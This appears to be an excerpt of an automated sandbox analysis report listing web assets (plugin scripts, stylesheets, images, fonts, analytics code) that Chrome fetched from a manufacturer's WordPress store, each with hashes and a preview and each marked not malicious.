                                                                            SHA1:75689BD8372834F40C366D3FE2A4FBA631E7D1AB
                                                                            SHA-256:BDAA4D33BF5219B34C9055537EC4BEC44991EDCED43C67F26DB3CD0FD90AE9FC
                                                                            SHA-512:6649DD437BF2B96094E92C69C761EA829766ED528CF4739C5D85A6609A6C9E237481F55A09F265587F05CFE54D4F2E19D735EE97F0201BD051921624106EF889
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/advanced-woo-search/assets/js/common.min.js?ver=3.20
                                                                            Preview:var AwsHooks=AwsHooks||{};AwsHooks.filters=AwsHooks.filters||{};(function($){"use strict";var selector=".aws-container";var instance=0;var pluginPfx="aws_opts";var translate={sale:aws_vars.sale,sku:aws_vars.sku,showmore:aws_vars.showmore,noresults:aws_vars.noresults};AwsHooks.add_filter=function(tag,callback,priority){if(typeof priority==="undefined"){priority=10}AwsHooks.filters[tag]=AwsHooks.filters[tag]||[];AwsHooks.filters[tag].push({priority:priority,callback:callback})};AwsHooks.apply_filters=function(tag,value,options){var filters=[];if(typeof AwsHooks.filters[tag]!=="undefined"&&AwsHooks.filters[tag].length>0){AwsHooks.filters[tag].forEach(function(hook){filters[hook.priority]=filters[hook.priority]||[];filters[hook.priority].push(hook.callback)});filters.forEach(function(AwsHooks){AwsHooks.forEach(function(callback){value=callback(value,options)})})}return value};$.fn.aws_search=function(options){var methods={init:function(){var appendResultsTo=AwsHooks.apply_filters("aws_resu
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):42560
                                                                            Entropy (8bit):7.982943787410003
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:870A68D574F279AD580B5FAC870422E6
                                                                            SHA1:D9D1CB6250355963DB0DFCBCFCF1E470AE3705EC
                                                                            SHA-256:70AF0D210F9120C7D17AB38EC87F66687E0F9F4DA98B4DD6886A13314342BA47
                                                                            SHA-512:ED60C4F197062EEC128CB1051E7ACDCCD15A71F0DC837AB704034348FA77961FA8481B2EEBE798E10A2BB124A470D6E5F098BC3411A24561A34F353990EB4CE1
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2021/02/Krypto_Klaw-300x300.png
                                                                            Preview:RIFF8...WEBPVP8L,.../+.J.M.$.n....hE..?.d.........y......-.$.o..53Kf.Kt....I)..[.$R.........$;3.E.l.fR.oJ..G{..O.2_.g....RH"...7k.4.RR....<b.....).@.t.G...$.0..^. M.v.|..&I.....%....e.H"E..#.'.x[..3f.W2..~Q8...H.s...&..6f.L..dGt"<....I..Q.........o.Hzf..3 I......p..7.j.3.\...;AU.^sE.......gv7..*....U.PLUa...\U.)........)...=...r)...z...=yi..(...X."=.?..l..6.a..v...{...F.m.0F..E..a.P.l..j{.H...#......_..{...)I..!>..G.'@...g.._b....qv....)..2~.:.g....S...-.}.qy9h{....).X...Rz.."j@SK.pk....S..:.X...?.Q....6.i.n..r'...4.b$.d..>&F.RJu^..j<..n\.2 ..!.B...Eh..-..-....9..z5..;d....!........?,.9.. OX.En!`....w.;........s.J.'....a.L..-..01......... ......4.VF.N.4....p....n....N.ziM....-.:. l...l..<.k....I...G..`.Q.ds.....e..V7).;.. ..M.|...A.$..d.J....Pm.v^.6.8.........a.I. .H..z.=V.NS..*m..".M.\fYa.....zb....U..B..X..S.d.QT..*.^..|N.q.q..=.}.M.....UHC..A.q..$.......Q!j..)......A.}..&. 4..Z.iq...M-.~.M...|.......5..?6..f.Eku...e.b....5!m..9=.....DN..:.A-...-.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):68
                                                                            Entropy (8bit):4.866587105828958
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:93B23FFE47981D6F0C2A28ACFCF237C3
                                                                            SHA1:44772E2329BF4E94B658C4E72C9008FEAD2A27D2
                                                                            SHA-256:1C1BB936DA01E2D8959A2F5BA6298D1C09E93BEDB117A316F780E559B0CABF3E
                                                                            SHA-512:2266D50660C0D9E9515143B81C67B21573C56A8ACAFEA35BCA5206978BA67134A22C1333814B6AACAF2E8F52F0987A24C26ACFD60FEE2134FB40B75DB821B7D1
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/instagram-feed/img/placeholder.png
                                                                            Preview:RIFF<...WEBPVP8L/.../...........!A...6"......?.........?.......?.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (6521)
                                                                            Category:dropped
                                                                            Size (bytes):309407
                                                                            Entropy (8bit):5.579605298408408
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:61C6A60B157E0F59A4967CCE5F30E5D8
                                                                            SHA1:0CABD9B5C0986BEDBC45F048133FFD2B50BC07AD
                                                                            SHA-256:195459E8DA5F76FD2500D7BB30943F7EF971E579E6AEE81E648C311CE5EC429D
                                                                            SHA-512:588AD5C131D98E01E9D6B6C3B4B17EC53070023672D725DA65DF4C688FDE0B250F459DE7CC68171573672AF803A19BBCE56C6CBF385B71C3625A7E5F3E320B8A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"11",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__jsm","vtp_javascript":["template","(function(){return document.querySelector(\".gform_validation_errors\")\u0026\u0026document.querySelector(\".gform_validation_errors\").checkVisibility()?\"true\":\"false\"})();"]},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_ena
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (9206)
                                                                            Category:downloaded
                                                                            Size (bytes):12815
                                                                            Entropy (8bit):4.900307759737748
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:7C24EC1D1C30BF1C8C686921EB9282D1
                                                                            SHA1:1DA1C964A15E67601D0B48360007A57C67B3E7BD
                                                                            SHA-256:B21DFCAE243571313013DFBB9038665E0D4896185652AC688A3123577C5FF972
                                                                            SHA-512:E78B02165A7EE7BBA1003AE6C9F27A0F61828C11E202A58323CD4028097047E4F076332CE452B2E6A9DA79E54C56C3E33BFED8D90E2DBC1FD0B3DB66AEAF90E9
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-9.4.1
                                                                            Preview:@keyframes spinner__animation{0%{animation-timing-function:cubic-bezier(.5856,.0703,.4143,.9297);transform:rotate(0deg)}to{transform:rotate(1turn)}}@keyframes loading__animation{to{transform:translateX(100%)}}body.wc-block-product-gallery-modal-open,body.wc-modal--open{overflow:hidden}.wc-block-grid__products .wc-block-grid__product-image{display:block;position:relative;text-decoration:none}.wc-block-grid__products .wc-block-grid__product-image a{border:0;box-shadow:none;outline:0;text-decoration:none}.wc-block-grid__products .wc-block-grid__product-image img{height:auto;max-width:100%;width:100%}.wc-block-grid__products .wc-block-grid__product-image img[hidden]{display:none}.wc-block-grid__products .wc-block-grid__product-image img[alt=""]{border:1px solid #f2f2f2}.edit-post-visual-editor .editor-block-list__block .wc-block-grid__product-title,.editor-styles-wrapper .wc-block-grid__product-title,.wc-block-grid__product-title{color:inherit;display:block;font-family:inherit;font-size:in
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (41336), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):41338
                                                                            Entropy (8bit):5.031349438913036
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:BF40FD82F8C84E6B3343E2D4508B8DD2
                                                                            SHA1:AF957221980059889CBA2BD52207237C37C5634A
                                                                            SHA-256:CD84906052265BF26212027DA19449E8C76ED7A05D533704035E9A8740FF140F
                                                                            SHA-512:172D280B3004D0AEE6208705346E64827A2D4FF29C4E917DA1D4DBF14A65A44A621270C7FB8CC86BA5B00115EC09C9D09D0924C5D5DB7D507692FB5E681A0764
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/yith-woocommerce-ajax-product-filter-premium/assets/js/ion.range-slider.min.js?ver=2.3.1
                                                                            Preview:!function(t){"undefined"!=typeof jQuery&&jQuery||"function"!=typeof define||!define.amd?"undefined"!=typeof jQuery&&jQuery||"object"!=typeof exports?t(jQuery,document,window,navigator):t(require("jquery"),document,window,navigator):define(["jquery"],(function(i){return t(i,document,window,navigator)}))}((function(t,i,s,o,e){"use strict";var h,r,n=0,a=(h=o.userAgent,r=/msie\s\d+/i,h.search(r)>0&&r.exec(h).toString().split(" ")[1]<9&&(t("html").addClass("lt-ie9"),!0));Function.prototype.bind||(Function.prototype.bind=function(t){var i=this,s=[].slice;if("function"!=typeof i)throw new TypeError;var o=s.call(arguments,1),e=function(){if(this instanceof e){var h=function(){};h.prototype=i.prototype;var r=new h,n=i.apply(r,o.concat(s.call(arguments)));return Object(n)===n?n:r}return i.apply(t,o.concat(s.call(arguments)))};return e}),Array.prototype.indexOf||(Array.prototype.indexOf=function(t,i){var s;if(null==this)throw new TypeError('"this" is null or not defined');var o=Object(this),e=o.l
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 19032, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):19032
                                                                            Entropy (8bit):7.988887194722028
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:40FC79AAE458350590C441182927DD7D
                                                                            SHA1:948441D616DB16CF537C0D5D340E979A0258E4C4
                                                                            SHA-256:5D7240126621DAE2B72C3368A40528D97BD25D00893CBEC284E27E63C660A51E
                                                                            SHA-512:8B5788AB90AAA452E29EB16314A9B39322C74BCA616D6798A43F43B3F3FE3C29557AAFAF2CA5E627B1D7405D0A6A7EC83C3E76847B366E9BA1700726373A2A2B
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://use.typekit.net/af/a2c82e/00000000000000003b9acaf4/27/l?subset_id=2&fvd=n3&v=3
                                                                            Preview:wOF2......JX..........I..........................:?DYNA..?GDYN....b.`.......s.....H..n..L..6.$.... .....S.B...u.c.....CDE..3R.~.....M.../....?..3p\.u.>.Z..".tU.......A#T....O<B.]...O.n....$.`...<..f......*.s.(T....U.ZWT..}FW\...q....W......y.V.6.....M..q.......\..6.G.@.G.hnm..!.X...E.Fm..R,.....H0..R...........JAPZNd..F.r..E..,.E...E....?._|u...9./..$J.;......O.W...nt"T.e.[.7^@.D.....N.VSq#..B.R _\...4.Z.A.!.f.K..$.B.....5.....k.u]...;...}...F....^.......Q ..A.?S.v.,..*.....)....*..R...Y.fv.:......P. ..*..{....b...T..c.H\&.I..:.!UVkw....em.m.C<.,s4.I7.E`Jc....w..(."...../e....a.3>..\P...K..x..y.~..W..I.."..Zg..f......k=..8...,.....Y_..Zl...p.x............G.D...q/.......}.........../..s..p.....F.....GO.ox._...B..c.w1..$....{............O?...1.A...Z..`U..L....\..."d.C_... ..h..Aj...._.|...L..'.b.C^.U.C..).V.ejh..d.eEW...]...+d-...nR.KS3YS...-WW...\..Ik..Z....G.drSc.Z[.&..a.O*...?X...2U./s..zn..A,.\u.r.......;M..,.l......e{...+V.L.w.....D...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):16
                                                                            Entropy (8bit):3.75
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:AFB69DF47958EB78B4E941270772BD6A
                                                                            SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                                            SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                                            SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlH3lXs9r0vtRIFDVNaR8U=?alt=proto
                                                                            Preview:CgkKBw1TWkfFGgA=
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):459
                                                                            Entropy (8bit):5.273310164780344
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:7F4334520CB5515630B7909B10DD1008
                                                                            SHA1:85E6BF316533E010AD31243CC2A3C30E58709C80
                                                                            SHA-256:76AD97E04FC8B12C99A2869E2310F11A7AC04EE404E4DCFEE4F8B996919F9688
                                                                            SHA-512:4EC66C7F09E44483D81FC8D3F96C81D40F3EEBA2CE39A5D9B54DBC4360C66C74FB24795CC4F1828000B219D1BEEBFECA10E1AF046A0F81F68AE8A6B7350E7AEB
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:{"watchFields":["b1668026547775","b1676389256155","b1668026547775","b1676389256155","b1668026547775","b1668026547775","b1676389256155"],"processedTemplate":"<div style=\"border: 1px solid red; padding: 10px; margin: 10px;\"><p style=\"color: red;\">Unable to load form.</p><p>Your form is not configured to work with this external domain.</p></div>","formProperties":{"hasRules":true,"hasAjaxResponse":false,"invalidDomain":true,"removeFormTabIndexes":false}}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65327)
                                                                            Category:dropped
                                                                            Size (bytes):70479
                                                                            Entropy (8bit):5.3810260084430395
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:216A00FB66FA9B149D5F8B5557F0F563
                                                                            SHA1:82BC27CA759871014AE0514E572338C88FC4DFFA
                                                                            SHA-256:CA9EAD1A878C5A474808166462389DA9859BBE06EE7C5E4365029C8062709121
                                                                            SHA-512:314FEEE537904409A49E7312232D17F5DFE8A647C816710859B0194D23C6F8C09E9C3DA8EA215D915A382227DD415F618091BD2D596BA79B49C600F0972295CE
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:/*! For license information please see project.js.LICENSE.txt */.!function(){"use strict";var t={}.toString,e=function(e){return t.call(e).slice(8,-1)},r=Array.isArray||function(t){return"Array"==e(t)},n=function(t){return"object"==typeof t?null!==t:"function"==typeof t},i=function(t){if(null==t)throw TypeError("Can't call method on "+t);return t},o=function(t){return Object(i(t))},s=Math.ceil,a=Math.floor,u=function(t){return isNaN(t=+t)?0:(t>0?a:s)(t)},c=Math.min,l=function(t){return t>0?c(u(t),9007199254740991):0},f=function(t,e){if(!n(t))return t;var r,i;if(e&&"function"==typeof(r=t.toString)&&!n(i=r.call(t)))return i;if("function"==typeof(r=t.valueOf)&&!n(i=r.call(t)))return i;if(!e&&"function"==typeof(r=t.toString)&&!n(i=r.call(t)))return i;throw TypeError("Can't convert object to primitive value")},d=function(t){try{return!!t()}catch(t){return!0}},h=!d((function(){return 7!=Object.defineProperty({},"a",{get:function(){return 7}}).a})),p="object"==typeof window&&window&&window.Ma
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1052), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1052
                                                                            Entropy (8bit):4.9587528935414245
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:0CDF8EB6F2ED58E9924E0D7DE60A8A65
                                                                            SHA1:E8FA4AA61D23E8B33A04DB6E96A759E0BCC6311E
                                                                            SHA-256:8999515B7173246833BA97930F98F45DB1095A1793E2B7889A5E388E6BEFA2E3
                                                                            SHA-512:E0B6E704302CC030E1086541C27B46E9CA66D7D6A8BE2ED93112155494CA05817DF59FD26D5484CD0B67DF1983D0B5F69C5F627580A95C8D8BB4C46C2B440060
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/wp-store-locator-widget/css/styles.min.css?ver=1.2.2
                                                                            Preview:@font-face{font-family:wpsl-fontello;src:url(../../wp-store-locator/font/fontello.eot?28897909);src:url(../../wp-store-locator/font/fontello.eot?28897909#iefix) format('embedded-opentype'),url(../../wp-store-locator/font/fontello.woff?28897909) format('woff'),url(../../wp-store-locator/font/fontello.ttf?28897909) format('truetype'),url(../../wp-store-locator/font/fontello.svg?28897909#fontello) format('svg');font-weight:400;font-style:normal}#wpsl-widget-form .wpsl-icon-direction{position:relative;padding:7px 9px 7px 8px;font-family:wpsl-fontello;font-style:normal;font-weight:400;font-size:1.3em;color:#737373;speak:none;text-decoration:inherit;text-align:center;font-variant:normal;text-transform:none;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#wpsl-widget-form .wpsl-icon-direction:hover{cursor:pointer;color:#000;outline:0}#wpsl-widget-form .wpsl-active-icon,#wpsl-widget-form .wpsl-active-icon:hover{color:#000}#wpsl-widget-form .wpsl-error{border:1px solid #bd0
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (64695)
                                                                            Category:downloaded
                                                                            Size (bytes):69952
                                                                            Entropy (8bit):5.298478898903238
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:A8FF401B0F0F82442CA6E8792296A600
                                                                            SHA1:4E0EC38BFA3E1E1E866CF596D3E500CF5317DB39
                                                                            SHA-256:6A616C52327A74E128EE40BB2D0DD873EFBBBD2F9FCC1E39B227E8AF9C1D6788
                                                                            SHA-512:7D9A1855BFA3C7D682679C7A39E255475CE24014809461853CB6F27890B66D4789F6541432B386CCC5EB6BC121A66E5002B6E467E8723D6F9D753AD4460AFA4A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://js.hs-analytics.net/analytics/1732046400000/47864039.js
                                                                            Preview:/** . * HubSpot Analytics Tracking Code Build Number 1.993. * Copyright 2024 HubSpot, Inc. http://www.hubspot.com. */.var _hsq = _hsq || [];._hsq.push(['setPortalId', 47864039]);._hsq.push(['trackPageView']);._hsq.push(['setLegacy', false]);._hsq.push(['addHashedCookieDomain', '224894981']);._hsq.push(['addHashedCookieDomain', '233546881']);._hsq.push(['addHashedCookieDomain', '20629287']);._hsq.push(['addHashedCookieDomain', '251652889']);._hsq.push(['addHashedCookieDomain', '213658891']);._hsq.push(['enableAutomaticLinker', true]);._hsq.push(['embedHubSpotScript', 'https://js-na1.hs-scripts.com/47864039.js', 'hs-script-loader']);._hsq.push(['initEventVisualizerScript']);._hsq.push(['setTrackingDomain', 'track.hubspot.com']);./** _anon_wrapper_ **/ (function() {./*! For license information please see hsa-prod.js.LICENSE.txt */.(hstc=hstc||{}).JS_VERSION=1.1;hstc.ANALYTICS_HOST="track.hubspot.com";(hstc=hstc||{}).Math={uuid:function(){if(window.navigator.userAgent.indexOf("googlewebli
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):74457
                                                                            Entropy (8bit):5.128064425074503
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:6525894D8DC728C88C667978C5A4D0E4
                                                                            SHA1:959F68413E50E4CF2A60341029FDCF14CD222D3D
                                                                            SHA-256:7FB4F64E19EB7BDAF9AC45C51944EB2CA76199A873DCA8152E3D2A1C636F20C3
                                                                            SHA-512:BC33CAD84C65544EF7067FD6C03D007D2A680841FB45458821F1B6B9920C50606E2929BC7E3CE215260B60EC9B62534C25EC97F7C3ED969C91752DDE565ABE69
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:(()=>{"use strict";var t=jQuery,e=t("body"),i=function(e){var i;if(void 0!==t.fn.block){var r="#fff center center no-repeat";"undefined"!=typeof yith_wcan_shortcodes&&null!==(i=yith_wcan_shortcodes)&&void 0!==i&&i.loader&&(r="url('".concat(yith_wcan_shortcodes.loader,"') ").concat(r)),e.block({message:null,overlayCSS:{background:r,opacity:.7}})}},r=function(e){void 0!==t.fn.unblock&&e.unblock()};function n(t){return n="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},n(t)}function o(t,e){for(var i=0;i<e.length;i++){var r=e[i];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,l(r.key),r)}}function a(t,e,i){return(e=l(e))in t?Object.defineProperty(t,e,{value:i,enumerable:!0,configurable:!0,writable:!0}):t[e]=i,t}function l(t){var e=function(t,e){if("object"!==n(t)||null===t)return t;var i
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):554
                                                                            Entropy (8bit):7.165311690297569
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:C034C482A7B087BF5FC342D9B0E49FAF
                                                                            SHA1:E6B0CDC82D78550A101CF9CA98E4286DC6833A0F
                                                                            SHA-256:C679594F449098A798B020237E19276BCD9EA58A8BA0875E34E1912E120EFF8C
                                                                            SHA-512:5AB82AEB17E2B91A1082F849F255082174B972F40188F63F384A23DBA07F713B24063E3C78A1DE096C2591A590DFF70147007CA3D7EB2477F10056A22E72EC3B
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...d...d.....G<ef...BPLTE...,,,,,, ---,,,(((***,,,------,,,,,,,,,---------+++---,,,,,,---........tRNS.....@ 0.`....P.p..oV#g`....IDATx.....0....y".p..U/....E;8.7.-k.GY..C.!..B..4...?.6..2..NQ..64.j0.Pf..Ld..Xa....C..i.Hr.T..&b...<.b...Y.....dq.T.&..Y."W.1..(..U.7...Gf..x.:#.p.oe.:#......E.(...l2...Fe..g.Ox.R...U.>1r.k.......{D...,.$.#......1.-......2c..*..X..D....\!!......M.W.....OKc...dQ|rF....h...hb.l..#.c1..%....2C.T.".]...y[Y)C.63.r....3...R*-.M^.[UN.!`.f.]2...hxl.,.L.x2)KZ..!cj3...B.!....?mO..:.......IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):51034
                                                                            Entropy (8bit):7.9817287881773655
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:CE3608DD61BE06EB4B06E90BC92578EA
                                                                            SHA1:8EFB22A8C0CB9DEA15E28E9316011A1736B89B43
                                                                            SHA-256:D7B1A0C775BBD90C0CD2BBE5800B23123012872219C05EAB7D0E89C4975394BF
                                                                            SHA-512:856B231381D7F500E5A3B02E15B412EF1D3F322C2FEA3C55123B62D004C945F215C7553BB66FA166004C5D06E120F24372515997BA5E6543A217CC801A598764
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...,...,.....y}.u...!IDATx...1j.Q......d.#.*..Vbee....>.......,.R....AD.%b.....,\B0..E..................................................................S......N..i.};.KKm...u.s4'i.B..e..RV.?...KJM...xp...%......Tv.n.L....Y.8mjZM...u....7IV...tmwXN.J....;\.>...m~.;..o?.<>...Q>.|....~.....~i.--.%].I?.)..X....|.."..|.{....w....h-iIZI.8.....e..B--.8.....u.k.=.8.......B.....x.....H.@.*K/..:...aD.4B..!.b.....vo..Zk..^{....<...HW.7lX.............=l..}.....fb....v...w).../p9F;.).........t....F...j?...........yhTv..T;...`..x....FB.S.Fl.@..........E...h.e.l...0w.2.%4.`0..2^.2zjI...).)&RA..=.diN-.$q..........Dv..... -..q.{1...W..3..K.C.....r.I.b...{..~.Q............ ..di;,.{.7..97.&.q0....^.h+8.|..}...%...dv........1y.h.l.J...)+......W.tl1..BDq.V.....3.C...Q.l...6..(-&,h5..}G.;d....x..cQ......s...}...D..Z.A.4..3`.....Yk.Y.....;A...~|.l...@.w..Gs........L.3+..<66Z_..y"...Q...G.Z.@rgU+...{.<..W...q....J..F.Cu..6z.hG...u\^.C..".....V....1.T.].
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (25650), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):25650
                                                                            Entropy (8bit):4.854996178118874
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:89A2A5106CEE7D01B1F02DB505ED2D62
                                                                            SHA1:23F77D10DC295FB0A85B0154295F54E177CDDB8C
                                                                            SHA-256:8F9FDF84940C389EF72C2DCADDE2972542ADA0B7FEF539D34A328CFF7F2C57B8
                                                                            SHA-512:DDAF8F5AB3B6354C38143CBE24AC9723E3ABAFA9F7CE11A4D33886AF3582793BD41080AB3B2B11E489BDE64E7317B53304CEA1083277A7803448555889F30D38
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/blog/masonry-classic-enhanced.css?ver=17.0.3
                                                                            Preview:.blog-recent[data-style*=classic_enhanced] .post-featured-img,.post-area.masonry.classic_enhanced .n-post-bg,.post-area.masonry.classic_enhanced .post .post-featured-img{transition:all .7s cubic-bezier(.2,1,.22,1);-webkit-transition:all .7s cubic-bezier(.2,1,.22,1);line-height:0;display:block;position:relative}.blog-recent[data-style*=classic_enhanced] .post-featured-img img,.post-area.masonry.classic_enhanced .post .post-featured-img img,.post-area.masonry.classic_enhanced .post.format-gallery .inner-wrap .flickity-slider .cell img,.post-area.masonry.classic_enhanced .post.format-gallery.large_featured .inner-wrap .flickity-viewport,.post-area.masonry.classic_enhanced .post.format-gallery.wide_tall .inner-wrap .flickity-viewport{margin-bottom:0;backface-visibility:hidden;-webkit-backface-visibility:hidden;transition:all .7s cubic-bezier(.2,1,.22,1);-webkit-transition:all .7s cubic-bezier(.2,1,.22,1)}.blog-recent[data-style*=classic_enhanced] .inner-wrap:hover .post-featured-img img,.b
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):23002
                                                                            Entropy (8bit):7.980872632477098
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:99F99E068B26F17CA52568A63665DFE1
                                                                            SHA1:03C58E8DEC446EC2FF26BC88FA66FCB19660F1C3
                                                                            SHA-256:6008276E934F83F8724B668A9F37DDC8B6621DC0316DC799428E827ACF1E445E
                                                                            SHA-512:2649BC50CC2AC746B76E3FAD83FBADE665441645864CBBBD7BFA379D8859A2DE451102088F5922034212D047D51CECA8E99B34CACA84BD0CE87CF6B5A958C847
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2024/04/General_Purpose_Performance_Series_Bucket_2024--300x300.png
                                                                            Preview:RIFF.Y..WEBPVP8L.Y../+.J.MHr#.$.GfV.<...N1r.1....?...X>1?./..h.&".9..C.5/"B...@.Y}.d/........1}eg.M....R.Lij..l.."B..%...T......m..Z...].N.......{...m#..)..E.$..zl.O..$@...6......\.Y'...m...n...\..NvU-.....1...`l..c.ax.....^.(......dm..H...rp.E..50t...z.sr..O.....$..~...x.>.F/.......!....-..+-....Sii%.>..|.\>.?.......ON?.?pb.....-...{..[lx.W.m....^q..p..t....nr.<..:.......1.n:.s.a.....p..S;.|...t..h.F.h.R"B........GDJ.....Q.>q.U....u...Sz....)F)..dRJ.RpJ.]q.....pJ.G..N\.(. B.F.......}j..D...\.%J...y..)...8.+.... ......t.U.}8p...F...D$$.\...^I)A$..5$"...H.@..>..}I&......"..(H$..R"z.....I.lI.L.;.(...h..-..,.. J.. ..DX....d......!... H.....k.j...ep......-.Eq..QZ.#..)R.....;.wC.DZ..(.g..._.Z..A.H)bmlq..........y.}..k....bH)-.vd.......lb.....|..r>+.....D:c...?;.[_o....^.^...|.5.]....!...h....m......Nm}d..>.....x.m..y.}^k..a.o.]...E..v....[Zwk....s~[.8.Mi.E:.................!..$I.<=R....Y......4...a..D.~...T.........I.aZ......@d.4q.=.dC..C}.Md...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 1920 x 805, 8-bit/color RGB, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):2342254
                                                                            Entropy (8bit):7.992446950603106
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:2A35623ED1E73155818E52A4F55AF08A
                                                                            SHA1:E23FAB32426BC14C737C35C0D0B0DD4F344DB516
                                                                            SHA-256:75B9848550138C83FC58F7CC584B9315C30CDF31069B0AFAB3D2B5E6373E2984
